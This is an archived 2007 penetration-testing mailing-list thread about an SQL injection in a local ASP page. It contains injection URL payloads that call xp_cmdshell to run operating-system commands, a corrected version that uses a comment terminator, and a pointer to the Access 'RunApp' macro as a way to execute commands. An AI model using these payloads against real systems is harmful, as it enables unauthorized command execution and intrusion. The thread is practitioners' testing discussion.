Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Missing Operator SQL

From: "Goran Pizent" <goran.pizent () mobilnet hr>
Date: Wed, 6 Jun 2007 11:29:56 +0200
Few thigs:


http://localhost/account.asp?ID=3D12';Exec master..xp_cmdshell 'dir



Should be:
http://localhost/account.asp?ID=3D12';Exec master..xp_cmdshell 'dir';--

-- is to comment out any where order by parts of SQL request

Another thing is you are obviously accessing MS Access database. 
xp_cmdshell will not help you here. 

Google "RunApp" Access macro and change request...

Regards,
GoranP



-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On
Behalf Of DokFLeed
Sent: 5. lipanj 2007 11:48
To: pen-test () securityfocus com
Subject: Missing Operator SQL

Howdy
I am testing this local application, not really a big fan of ASP so any =
help is welcome

http://localhost/account.asp?ID=3D12';Exec master..xp_cmdshell 'dir

Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression 'D.xID=3D12';EXEC =
master..xp_cmdshell 'dir'.


What is the missing operator for ?


Cheers,
Dok


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!

http://www.cenzic.com/c/2020
------------------------------------------------------------------------




------------------------------------------------------------------------
This List Sponsored by: Cenzic

Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!

http://www.cenzic.com/c/2020
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: